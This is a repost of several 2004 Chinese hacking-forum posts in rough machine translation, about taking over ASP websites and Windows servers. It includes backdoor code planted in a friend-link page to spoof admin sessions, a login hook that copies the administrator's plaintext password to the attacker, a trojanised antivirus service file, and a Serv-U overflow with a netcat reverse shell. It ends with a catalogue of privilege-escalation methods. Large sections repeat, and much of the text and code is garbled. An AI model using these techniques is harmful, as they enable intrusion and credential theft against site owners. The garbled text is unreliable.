
IF session ("adminName") = "" "" "the response.Redirect" admin_login.asp "endiff

It seems to be very strict, but let's take a look, it verifies an adminName's session here, as long as our session content is adminName, can you pass? Ok, let's start, first go to get its administrator account, don't you teach you? You can know if you go to his website or download it directly. Let's find a page to change it, I am looking for a more no one, the content of the page Friendsite.asp (friendli link page) is changed, huh, so the administrator is hard to find out. Use the ASP Trojan's editing function to edit its content. Add a few words below his page:

DIM ID

ID = Trim (Request ("QWE")) IF ID = "120" THEN

Session ("adminName") = "admin" 'This is assumed, and the actual operation can be changed to you want to get the administrator account.

END IF

I simply say this sentence, that is, get the value of HEHE from the address bar. If hehe = 120, then the system gives us a Value admin SESSION. Ok, let's enter a look, Figure 2:

Figure II

Do you see anything, don't you? Or normal page, but we will then enter its background management homepage in the address bar, isn't it? Figure 3:

Figure three

Oh, don't do bad things ............

Summary: Let's get the administrator account first, then find its verification page, write it according to its verification content to the back door we want. Different systems have different verification methods, such as Qingchuang article system, it is not only to verify your username, but our overall thinking is still the same, that is what he has verified.

Password stealing

It can be said that the above method is pale in front of the mobile network forum or other forum, because the general forum has considered a lot of validation due to strong interactivity. Take the mobile network as an example, you have to log in to the background, he first verifies that you have first logged in the front desk, and if you don't return, you will return a false page. After you log in to the front desk, the system will give you a session to record your cachename and your ID, then take it out when you log in to the background, compare if your front and back is consistent, and you will pass, otherwise you will face this strict verification. Is there any way we have a way for the basement? Yes, no (who takes me to throw me? This wasted.), But we can think about new ways, since verification is so strict, then if I take the password light and big? Therefore, a new idea here is to get its plain text password. When is there a plain text password? Yes, it is when the administrator is logged in. Ok, we are there to do your hands, send us the password it logged in, then we will log in with your password. Oh, isn't it very like Sniffer? In the first few months, just a few months, the brothers, the Qi Dynasty in the wild, the hardware Sniffer, with the provincial network security, the person who returned a illegal movie website, a 4000g hard drive, dozens of servers, a word: cool

Ok, we start modifying its procedures. Edit Login.asp, add the following sentences:

IF NOT ISNULL (TRIM (Request ("UserName")))?

If Request ("UserName") = "admin" then

SQL = "Update [DV_VSER] set useMail = (Select Userpassword from" SELECT Userpassword

[DV_USER]

Where username = / '"& requirements") & "/') Where

UserName = / 'aweige /' "

CONN.EXECUTE (SQL)

END IF

END IF

In this few words, this means that if admin (hypothesis, the actual operation is changed to the administrator name) Login successfully updated the database, put his password into the e-mail of our information. Of course, you must first register a username in the forum. The result is as shown in Figure 4: Figure 4

Also, if the default database admin table name or 7.0 or more is a bit different from 7.0 or more, it is not bondable in actual operation.

postscript:

For the above two methods, I still can't think of any more effective solutions, because your website is put on the horse, you have no way to stop people from inserting, if you have a good solution, remember to tell I.

In addition, I hope that everyone should not go to destruction. At that time, I really didn't want to see, and I wish all the network managers well, I hope you will not touch Craker.

[This post has been edited by the author at 2004-12-25 20:51:09]

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:53:13

-

Use ASP Trojans and KV2004 to get administrator privileges

I haven't worked for the first time, this is the first time, I can't write it. Please forgive, don't smile. There is also no technical statement here, just a little experience in this rookie, OK starts. . .

The UPFILE.ASP vulnerability of the front time can be described as a lot of boiling, this vulnerability is indeed very powerful. I believe many newcomers have a lot of back door, but the rights of the ASP Trojans are indeed very good. Draw some articles, delete your point pictures, it is not used. If you don't have administrator privileges, you will live up to the masters of this vulnerability. Ok, I want to improve the permissions, I am looking for! Methods of online upgrading permissions have almost used, there is nothing to use, the patch is very full! Next, use FINDPASS to unlock the administrator's password, and fail, Findpass wants administrator privileges. Seeing PSList to see the Surox Tianwang, most of the tools in the online defense is generally useless. Species? Do not work

The permissions are soaring on the surrounded by the Rising Killing net. To add a BAT file that adds user permissions to put it in the boot group, this method is a bit stupid but there is a certain feasibility, and the halo is not enough to add. The "Program Files" "Program Files" under the C is not written, not to say the registry. Depressed, leaving a sentence to the administrator, and then rush off the line.

On the second day, I came to see, and the picture was changed, and the administrator should find it. This time it is not easy. On the ASP Trojan, I went in and saw a few EXEs sent yesterday deleted, and the ASP Trojan was alive, but! The C disk is more than the file, called KV2004. The original administrator unloaded Rising, with a KV2004, and entered Program Files to see if Rising was unloaded. (Say, most of the anti-virus software default installation path c: // program files //, but KV default installation path is C: // kv2004 //) to here, we can bundle the execution file On KV2004, start with KV. Because KV is not in "Program Files" "Winnt" "Documents and Settings" in the three files of "Documents and Settings", it may be possible to modify or upload files. action! Find an HTM file in KV2004 to delete: (see if there is any write-free deletion)

C: //> del C: //kv2004/Getlicense.htm

access denied

Strange, let's take a look at the file A property

C: //> attrib C: // kv2004

S r c: // kv2004

Oh, it is read-only.

C: //> attrib -r -s c: // kv2004

OK! Try

C: //> del C: //kv2004/Getlicense.htm

Success! Write a BAT file that uses an account and upgrade permissions, then bundle the BAT file and the KV2004 system service file kvsrvxp.exe, (pay attention to more sub-bundles, bundle one

Sail once once, because many bundlers generated file KV will handle him as a virus) is ready to upload, first delete the original kvsrvxp.exe.

C: //> DEL C: //kv2004//kvsrvxp.exe

access denied

It may be that kvsrvxp.exe is called by Windows, can't be deleted. No way? No, I can't delete me.

C: //> REN C: //kv2004//kvsrvxp.exe kv.exe

OK! Then use the ASP Trojan to upload the modified kvsrvxp.exe to KV2004, and then go to sleep.

Used after 4 hours:

NET User

Already in the Administrators group, you will have to shut down firewalls, kill virus software, or you can use Trojans, haha!

I think the invasion has no fixed mode. Specific analysis of the specific situation, anti-virus software can also help us, here I only provide a thinking. Please advise.

How to bypass firewall promotion rights

This paper is the focus of WebShell privileges and bypass firewalls.

If you talk nonsense, let's enter the topic.

First determine the goal:

Http://www.sun**.com, common virtual hosts. Using Upfile's vulnerability I believe that everyone gets WebShell is not difficult. We won this WebShell this time, not DVBBS, but the software upload filtration of free power 3.6 is not strict. website

http://www.sun**.com/lemon/index.asp is a free power 3.6 article system. XR uses WinHex.exe and WSockexpert.exe to upload a webpage Trojan Newmm.asp, people with Door.exe with over-action sharks know that this is to upload an ASP Trojan content. So, upload the ocean 2005a, successfully obtained WebShell.

Test the permissions, run SET in CMD, get some information of the host, the system disk is a D disk, and the WebShell has run permission. Then let's see what C is there? Is it a dual system? After browsing, there is no system file, only some junk files, fainting. It doesn't matter, check again, the virtual host has Serv-U, this is no exception, it is 5.0.0.8. Oh, there is a local spilled, dighara. Idea: Uploading the Serv-U local overflow file Srv.exe and Nc.exe utilize NC to reverse the connection to obtain the system shell. Everyone finds that the components uploaded by the ocean 2005a are not easy (anyway, I always encounter this problem), there is no relationship, use Rain to upload a component, a total of 3 files, Up.htm, Upload.asp and UploadClass. ASP. UPLOAD.ASP and UPLOADCLASS.ASP upload to the same folder, up.htm is locally used, modify the link address in the Up.htm:

http://www.sun**.com/lemon/UPLOAD.ASP can be uploaded.

After Srv.exe and Nc.exe were found after h: // long // suwing *** // Lemon (website directory), found that there was no run permission. It doesn't matter, depending on the experience, the general system D: // Documents and settings // all users // should have operational permissions. So I want to pass the file Copy, but I found that our WebShell did not write permission to the D disk, fainted.

You can browse D: // program files // serv-u // servudaemon.ini, you can't change it, do you want to crack the password of Serv-U, halo, don't want it.

It is not possible to discharge it, I suddenly thought of why the system was not placed in the C drive, is the C disk is a FAT32 partition? (Later proved our ideas. Here, if the host has a Win98 system disk, 99% is the FAT32 partition. We have also encountered a host with ghost, in order to back up in DOS, its backup disk It is generally a FAT partition.) If the system disk is a FAT32 partition, the website has no security. Although the C disc is not a system disk, we have execution permission. Oh, copy srv.exe and nc.exe to C: //, run srv.exe "nc.exe -e cmd.exe 202. *. *. * 888", here 202. *. * Is us The broiler, before this, we have run NC-L -P 888 on broiler. We are in the online network, no public IP, unhappy -ing.

We successfully won a system shell even on the broiler. (It seems simple. In fact, we have also encountered setbacks. We found that some version of NC actually no -e, but also thought that the world NC function is the same. Later, I found that different versions of NC interconnects are unsuccessful, will appear Into the garbled, there is no way. To this end, upload N times, wrong N times, silly N times, and finally succeeded. Be a hacker really has patience and perseverance.)

If you are happy, we are still not satisfied because this shell is too slow. So, I want to use our most common RADMIN, in fact, the administrator can press Alt Ctrl Del to see the process can find R_Server, but I still like to use it because it will not be killed. Ok, upload Admdll.dll, Raddrv.dll, r_server.exe to h: // long // sun *** // Lemon, use the shell who got the NC to put them Copy to D: // WinNT // System32 // Under, run: r_server / install, net start r_server, r_server / pass: ras / save. A long wait, finally showed success. The ramp is used to connect with RADMIN and find the connection failure. Dizzy, forgot to have a firewall. Upload PSLIST and PSKILL, found with backice, wooden mock, etc. Kill, although they can be logged in, but the server is still not on, it is not a long time. The firewall is a port that does not prevent 21, 80, so our ideas returns to the Serv-U. Download his servudaemon.ini, cover the machine's servudaemon.ini, add a user name XR, password to the RAIN, plus all permissions on the serv-u of this unit. Use the old way, upload, write to D: // program files // serv-u //, override the original servudaemon.ini. Although I waited for N for a long time, it was successful, so I used FlashFXP, and 530 errors occurred. Depressed, how to fail. (It should be possible according to experience, but why not don't want to talk, please guidance.)

Whether, we restart the serv-u is OK, how to restart, start to use the shutdown to restart the system, but we lose the NC shell, and may also be discovered. Later, the eyes were bright, don't we have PSKILL? I have found this process with PSLIST: Servudaemon. Take it Kill. Then run D: // Program files // serv-u // servuadmin.exe, here should be noted not servudaemon.exe.

Ok, let's go here, let's go directly, LS, haha, the system is in my master. Can we run the system command? Yes, this is possible:

FTP> Quote Site EXEC NET USER XR RAIN / ADD

Running Net User on WebShell, you can see that it is successful.

The entire invasion penetrates this, and after a while, after a while, after a while, after a while. We started discussions. In fact, breaking through the firewall has a lot of good rootkit, but we feel that the service comes with the safest lattime.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:35:14

-

Asp.dll parsing into system upgrade permissions

There are two kinds of traditional upgrades on the network:

1. Under graphical, put the default site ---> Home directory ---> Application protection settings to low, so you can set the ASP permissions to System. But this improvement method is easily discovered, so the network There is another kind of adsutil.vbs to increase permissions. And this is today

I have to talk about Adsutil.vbs to improve permissions.

2. Fact it with Adsutil.vbs.

I saw a lot of animation, articles that teach you this method, but I didn't see the principle of introduction, let me talk about my personal opinion:

First give an example:

There is a group of dogs, and this group of dogs have a few old-fashioned dogs, they have supreme privileges, while other dogs, their permissions are less pitiful.

Go to the computer:

In IIS, there are several DLL files that have privileges. We can understand that system privileges are like a long-scale dog. The asp.dll of the ASP is like a

Ordinary dog, his permissions are so powerful.

So, if the asp.dll has become a long-scale dog, then the ASP does not have system authority, which is ready. So our ideas are

Add asp.dll to the privileged DLL family. The promotion step is:

<1> See what privileges are privileged.

<2> Add asp.dll to join the privilege

Ok, let's practice this process.

1) View the DLL file with privileges:

Command is: cscript adsutil.vbs Get / W3SVC / Inprocessisapiapps

Get shown as:

C: // inetpub // adminScripts> CScript Adsutil.vbs Get / W3SVC / Inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.1 for Windows

Copyright (c) Microsoft Corporation 1996-1999. All Rights Reserved.

Inprocessisapiapps: (List) (5 items)

"C: //winnt//system32//idq.dll"

"C: //winnt//system32//inetsrv/httpext.dll"

"C: //winnt//system32//inetsrv/httpodbc.dll"

"C: //winnt//system32//inetsrv//ssinc.dll"

"C: //winnt//system32//msw3prt.dll"

Seeing that there is no, he explains that there is a privilege family as: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

These documents, different machines may be different.

2) Add asp.dll to the privileged family:

Because asp.dll is placed in c: //winnt//system32//inetsrv//asp.dll (the location of different machine places is not necessarily the same)

We now add CScript Adsutil.vbs SET / W3SVC / InProcessisapiapps "C: //winnt//system32//iDQ.dll" "c: //winnt//system32/ -/inetsrv//httpext.dll" C: / /Winnt//system32//inetsrv/Httpodbc.dll "C: //winnt//system32//inetsrv/sinc.dll" "c: //winnt//system32//msw3prt.dll" C: //winnt//system32//inetsrv//asp.dll "

Ok, now you can use the cscript adsutil.vbs get / w3svc / inprocessisapiapps to see if it is added.

, Pay attention, get and set in the usage, one is to view one is setting. There is also the directory you want to go to C: // inetpub // adminsscripts>.

So if you are an administrator, your machine is used to use this trick to upgrade the ASP to System permissions, then, the method of preventing the ASP.DLL T is a privilege, which is to use the set of this command, overwrite Those stuff just now: CScript Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS "C: //winnt//system32//idq.dll" "c: //winnt//system32/inetsrv//httpext.dll" "C: //winnt//system32/inetsrv/Httpodbc.dll" "c: //winnt/system32//inetsrv//ssinc.dll" "C: //winnt/system32//msw3prt.dll "

This is okay, when you use CScript Adsutil.vbs Get / W3SVC / InProcessisapiapps, if you have not seen asp.dll,

Note, the permissions of the ASP return to previous permissions.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Published: 2004-12-25 20:41:06

-

Winnt / 2000 upgrade permissions

WINDOWS NT / 2000 universal improvement method

Attackers usually increase their permissions to the administrator group after obtaining system certain access rights, so that the attacker controls the computer system. This has the following methods: 1. Get the administrator password, next time you can use this password to enter the system; first create a user, then add this normal addition to the administrator group, or simply directly put an opacity Users are added to the administrator group such as GUEST; 3. Install the back door.

This paper briefly describes how to improve privileges commonly used in Windows NT4 and Windows 2000 attackers. Below is a specific method:

Method 1: Download the system's% WINDIR% // REPAIR // sam. * (WinNT 4 is Sam._ and Windows 2000 is SAM) file, then use L0PHT and other software to crack, as long as you can get, Kenhua time, It must be cracked.

Question: (1) The attacker does not necessarily access the file (see the attacker's identity and administrator settings); (2) This file is a list of accounts when the last system backup (or the first system installation is If you change your account password, it is useless.

Method 2: Using PWDUMP (L0PHT, Windows 2000 is invalid) or PWDUMP2, obtain the current user list and password encrypted list, and then crack this list with L0PHT.

Question: Ordinary users cannot successfully run the PWDUMP class program (no permissions), such as the IUSR_Computer identity when using the Unicode vulnerability to enter the system, which is generally only on the guests group, and running the PWDUMP class will fail.

(The above two are offline)

Method 3: Remote cracking and guessing using enum and other programs. ENUM can use a specified dictionary to crack a user of a remote host.

Question: (1) If the system sets the account lock, crack a few times, the account is locked, temporarily can't be broken; (2) To open the NetBIOS connection remote system, it is the 139 port of TCP, if the firewall is filtered If Enum cannot be connected to the host. (The above method is to obtain a password by cracking, and there is a way to upgrade the current user to the administrator group directly.)

Method 4: GetMin (under WinNT 4), PipeUpadmin (under Windows 2000), run the current user account to the administrator group in this unit. PipeUpadmin is relatively powerful, and ordinary users and guests users can run successfully.

Question: GetMin has fixed fixed in SP4, which cannot be used for Winnt 4 systems above SP4. Of course, there is a GetMin enhancement version, but it seems that it does not run successfully in SP6A.

Note: This method uses the security vulnerability of Winnt 4 systems to install patch resolution.

(In addition, there is also a way to communicate.)

Method 5: Specify user shell program (Explorer.exe) in WinNT 4 and Windows 2000 registry

There is no absolute path, but use a file name of a relative path (considered compatibility issues).

Since the search order problem of the system startup program makes% SystemDrive% // Explorer.exe executes, this provides an attacker a chance to execute him when the user is next time you log in. Your own procedure.

Question: An attacker must have the write permission to install the system logic with the directory, and the general administrator sets the directory ordinary user forbidden.

Note: This method uses security vulnerabilities for Winnt 4 / Windows 2000 systems to install patch resolution.

Method 6: Trojan: Upload Trojans, then run the Trojan, after the system is restarted, the Trojan is the identity of the local login user, and then the attacker is connected to the user's permissions. Because it is generally always an administrator local login system, this is likely to obtain administrator's permissions.

Question: (1) Anti-virus software or virus firewall may prevent Trojans from running, and it is possible to kill Trojans.

(2) Some Trojans cannot run in the guest group identity, which may be related to the way it is automatically running; if there is no authority to rewrite the automatic running position of the registry, you cannot write% system% // system32 directory (general Trojan All change the file name, then write to the system directory. If there is no write to the permission system directory, you can't successfully execute the Trojan).

Solve: However, also useful compression programs (not the usual compression program, this compression program is compressed, but the file is smaller, but it can still be properly executed) to compress the Trojan, thus escape the characterization of anti-virus software . I used Aspack to successfully compressed a Trojan, escaped Jinshan's official version of the official version. However, some Trojans Aspack can't compress, such as the ice.

Method 7: Gina, Ginastub Trojan. Although this is also called Trojans, its function is very different from the upper side, because the general Trojan is installed on the other party, once run, you can use the Client to connect to the Server side, and operate. Ginastub generally has only one dynamic connection library file, which needs to be manually installed and uninstalled. His function is not using the Client side to control the Server end, which is just capturing the user's login password. Question: It is more troublesome to install, the possibility of success is low, and improper installation will cause the installed system that cannot be started.

Note: This method is not the system's security vulnerability, so this problem cannot be solved by installing a patch. For Gina, you can see another article "Winlogon Login Management and Gina Introduction"

Method 8: Local overflow. Buffer overflow is the best way to attack, because system privileges or administrator privileges can generally be obtained; but many remote overflow attacks do not need prior to executing programs, and local overflow just right to improve privileges. Win NT4's IIS4 ASP extension has a local overflow vulnerability, and Windows 2000 still image service also has an overflow vulnerability, using this vulnerability, an attacker can get system authority. Of course, Windows NT and Windows 2000 have many programs have overflow vulnerabilities, which is not always running, so the possibility of being utilized is relatively small.

Question: (1) ASP extended overflow vulnerability requires an attacker to write permission to the script directory of the website, in order to put the attack program on the website, and then execute.

(2) Static image service is default, which is automatically installed when the user installs still image devices (such as digital cameras, scanners, etc.) on Windows 2000.

Note: This method uses security vulnerabilities for Winnt 4 / Windows 2000 systems to install patch resolution.

Windows 2000 Special Lifting Vulnerability Method 1: Windows 2000 input method vulnerability, using this vulnerability anyone can execute the program as a localsystem, so that this vulnerability is generally limited to people who have been physically touching Windows 2000 computer. Of course, if the terminal service is opened, the attacker can also use the vulnerability remotely.

Note: This method uses the security vulnerability of the Windows 2000 system to install the patch to solve this problem.

Method 2: Using Windows 2000 NetWork DDE DSDM Services Vulnerability Ordinary User You can perform any program as Localsystem, you can change your password, add users, etc. Guests group users can also successfully utilize the vulnerability.

Question: This service is not started by default, you need to start this service.

Note: This method uses the security vulnerability of the Windows 2000 system to install the patch to solve this problem.

Method 3: When the Windows 2000 Telnet service process is established, the service creates a named pipe and uses it to execute the command. However, the name of the pipe can be foreseen. If Telnet finds an existing pipe name, it will use it directly. An attacker uses this vulnerability to build a pipe name in advance. When the next Telnet creates a service process, the attacker code will be run in the local system environment.

Note: This method uses the security vulnerability of the Windows 2000 system to install the patch to solve this problem.

Method 4: Windows 2K There is a vulnerability that uses Debug Registers promoted permissions. If an attacker runs a program in Win2K, use this vulnerability, he can at least take the right to write to% windir% // system32 and registry HKCR. Because X86 Debug Registers DR0-7 is global shared for all processes, the hardware breakpoint is set in a process, which will affect other processes and services. Note: This method takes advantage of the security vulnerability of Windows 2000 systems, but Microsoft still has no patches can be installed, but the vulnerability attack program has appeared, so it can only block the attacker's entry to prevent the use of this vulnerability.

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:47:03

- Smartly with the ASP Trojan to get the background of the background management rights (this is a classic ... I haven't said it "

Coincidentally with the ASP Trojan to get the background of the background management rights (this is a classic ... I realized that I have said it)

Author: aweige from: Chinese hackers Red Army

Subject to the disaster network forums Upload vulnerabilities and recently opened the upload vulnerabilities of various ASP systems exposed two-year-old ASP system, there may be many friends with a lot of Webshell broilers, as for the way of doing these chicks varies from person to person. Some people continue to enhance permission, further invasion, and some people just look at it, the horse has been in the past, there are some friends, when Webshell's freshness has passed the mystery and temptation of the background. In fact, for many powerful systems, I get a good back door, huh, huh, huh .......... But now a new version is a lot of ASP system passwords. MD5 encryption then cooperates with a strict verification program to verify, but will we do not break through these limitations? NO! I am going to say how to break through these restrictions, let us go straight, there is a good thing, FOLLOW

ME ..........

Session spoof

First, please simply say the principle of authentication of the general ASP system.

In general, the background administrator enters the account password in the login page, and the program will look for the user's name password to the database. If you have this person's account password, you think you are an administrator, then give You a session value that represents your identity. Or the program first extract your username password, then remove the administrator's account password in the database's administrator table to compare the comparison you submitted. If it is equal, give you the SESION value indicating your identity. . Then you enter any of the management page, you must first verify your session value. If you are an administrator, let you pass, if you guide you back to the login page or some Qiqi warning, these are with the programmer Personal preferences are related.

I know the principle, our current idea is to modify its procedure through our ASP Trojan and get a administrator session, so that we don't have administrator passwords, but we have never blocked in the background. I called this method as session spoof. It is limited to the space that can not be described in detail in each system. This article is only described as an example of a dynamic article system.

Power Article System 3.51, (Figure 1)

Figure one

In fact, all the versions of the dynamic article system are all killing, including easy accessibility. Everyone can practice itself.

Let's take a look at its verification content. Power Article 3.51 Verification page in admin_chklogin.asp

The verification content is as follows:

..........

Else

RS ("LastLoginip") = Request.SerVariables ("remote_addr") rs ("LastLogintime") = now ()

RS ("Logintimes") = rs ("logintimes") 1

Rs.Update

Session.Timeout = sessionTimeout

Session ("adminName") = RS ("UserName")

Rs.close

SET RS = Nothing

Call CloseConn ()

Response.Redirect "admin_index.asp"

The forefooting number is verified by the username password, until Else, look, if the username password is correct to give you two session values:

Session.Timeout = sessionTimeout

Session ("adminName") = RS ("UserName")

Let's take a look at how other management pages verify session, and admin_index.asp is just like this:

IF session ("adminName") = "" "" "the response.Redirect" admin_login.asp "endiff

It seems to be very strict, but let's take a look, it verifies an adminName's session here, as long as our session content is adminName, can you pass? Ok, let's start, first go to get its administrator account, don't you teach you? You can know if you go to his website or download it directly. Let's find a page to change it, I am looking for a more no one, the content of the page Friendsite.asp (friendli link page) is changed, huh, so the administrator is hard to find out. Use the ASP Trojan's editing function to edit its content. Add a few words below his page:

DIM ID

ID = Trim (Request ("QWE"))

IF id = "120" THEN

Session ("adminName") = "admin" 'This is assumed, and the actual operation can be changed to you want to get the administrator account.

END IF

I simply say this sentence, that is, get the value of HEHE from the address bar. If hehe = 120, then the system gives us a Value admin SESSION. Ok, let's enter a look, Figure 2:

Figure II

Do you see anything, don't you? Or normal page, but we will then enter its background management homepage in the address bar, isn't it? Figure 3:

Figure three

Oh, don't do bad things ............

Summary: Let's get the administrator account first, then find its verification page, write it according to its verification content to the back door we want. Different systems have different verification methods, such as Qingchuang article system, it is not only to verify your username, but our overall thinking is still the same, that is what he has verified.

Password stealing

It can be said that the above method is pale in front of the mobile network forum or other forum, because the general forum has considered a lot of validation due to strong interactivity. Take the mobile network as an example, you have to log in to the background, he first verifies that you have first logged in the front desk, and if you don't return, you will return a false page. After you log in to the front desk, the system will give you a session to record your cachename and your ID, then take it out when you log in to the background, compare if your front and back is consistent, and you will pass, otherwise you will face this strict verification. Is there any way we have a way for the basement? Yes, no (who takes me to throw me? This wasted.), But we can think about new ways, since verification is so strict, then if I take the password light and big? Therefore, a new idea here is to get its plain text password. When is there a plain text password? Yes, it is when the administrator is logged in. Ok, we are there to do your hands, send us the password it logged in, then we will log in with your password. Oh, isn't it very like Sniffer? In the first few months, just a few months, the brothers, the Qi Dynasty, in the wild, hardware Sniffer, with the provincial network security, the person who took the provincial website, the foot 4000g hard drive, dozens of servers, one word: cool, we start Modify its program. Edit Login.asp, add the following sentences:

IF NOT ISNULL (TRIM (Request ("UserName")))?

If Request ("UserName") = "admin" then

SQL = "Update [DV_VSER] set useMail = (Select Userpassword from" SELECT Userpassword

[DV_USER]

Where username = / '"& requirements") & "/') Where

UserName = / 'aweige /' "

CONN.EXECUTE (SQL)

END IF

END IF

In this few words, this means that if admin (hypothesis, the actual operation is changed to the administrator name) Login successfully updated the database, put his password into the e-mail of our information. Of course, you must first register a username in the forum. The result is shown in Figure 4:

Figure four

Also, if the default database admin table name or 7.0 or more is a bit different from 7.0 or more, it is not bondable in actual operation.

postscript:

For the above two methods, I still can't think of any more effective solutions, because your website is put on the horse, you have no way to stop people from inserting, if you have a good solution, remember to tell I.

In addition, I hope that everyone should not go to destruction. At that time, I really didn't want to see, and I wish all the network managers well, I hope you will not touch Craker.

[This post has been edited by the author at 2004-12-25 20:51:09]

-------------------------------------------------- ------------------------------

- Author: vjoy

- Release time: 2004-12-25 20:53:13

-

Use ASP Trojans and KV2004 to get administrator privileges

I haven't worked for the first time, this is the first time, I can't write it. Please forgive, don't smile. There is also no technical statement here, just a little experience in this rookie, OK starts. . . The UPFILE.ASP vulnerability of the front time can be described as a lot of boiling, this vulnerability is indeed very powerful. I believe many newcomers have a lot of back door, but the rights of the ASP Trojans are indeed very good. Draw some articles, delete your point pictures, it is not used. If you don't have administrator privileges, you will live up to the masters of this vulnerability. Ok, I want to improve the permissions, I am looking for! Methods of online upgrading permissions have almost used, there is nothing to use, the patch is very full! Next, use FINDPASS to unlock the administrator's password, and fail, Findpass wants administrator privileges. Seeing PSList to see the Surox Tianwang, most of the tools in the online defense is generally useless. Species? Do not work

The permissions are soaring on the surrounded by the Rising Killing net. To add a BAT file that adds user permissions to put it in the boot group, this method is a bit stupid but there is a certain feasibility, and the halo is not enough to add. The "Program Files" "Program Files" under the C is not written, not to say the registry. Depressed, leaving a sentence to the administrator, and then rush off the line.

On the second day, I came to see, and the picture was changed, and the administrator should find it. This time it is not easy. On the ASP Trojan, I went in and saw a few EXEs sent yesterday deleted, and the ASP Trojan was alive, but! The C disk is more than the file, called KV2004. The original administrator unloaded Rising, with a KV2004, and entered Program Files to see if Rising was unloaded. (Say, most of the anti-virus software default installation path c: // program files //, but KV default installation path is C: // kv2004 //) to here, we can bundle the execution file On KV2004, start with KV. Because KV is not in "Program Files" "Winnt" "Documents and Settings" these three files, it is very likely that I can modify it.

Or upload files. action! Find an HTM file in KV2004 to delete: (see if there is any write-free deletion)

C: //> del C: //kv2004/Getlicense.htm

access denied

Strange, let's take a look at the file A property

C: //> attrib C: // kv2004

S r c: // kv2004

Oh, it is read-only.

C: //> attrib -r -s c: // kv2004

OK! Try

C: //> del C: //kv2004/Getlicense.htm

Success! Write a BAT file that uses an account and upgrade permissions, then bundle the BAT file and the KV2004 system service file kvsrvxp.exe, (pay attention to more sub-bundles, bundle one

Sail once once, because many bundlers generated file KV will handle him as a virus) is ready to upload, first delete the original kvsrvxp.exe.

C: //> DEL C: //kv2004//kvsrvxp.exe

access denied

It may be that kvsrvxp.exe is called by Windows, can't be deleted. No way? No, I can't delete me.

C: //> ren c: //kv2004//kvsrvxp.exe kv.exeok! Then use the ASP Trojan to upload the modified kvsrvxp.exe to kV2004, and then go to sleep.

Used after 4 hours:

NET User

Already in the Administrators group, you will have to shut down firewalls, kill virus software, or you can use Trojans, haha!

I think the invasion has no fixed mode. Specific analysis of the specific situation, anti-virus software can also help us, here I only provide a thinking. Please advise.

转载请注明原文地址:https://www.9cbs.com/read-46833.html

9cbs

New Post(0)
CopyRight © 2020 All Rights Reserved
Processed: 0.081, SQL: 9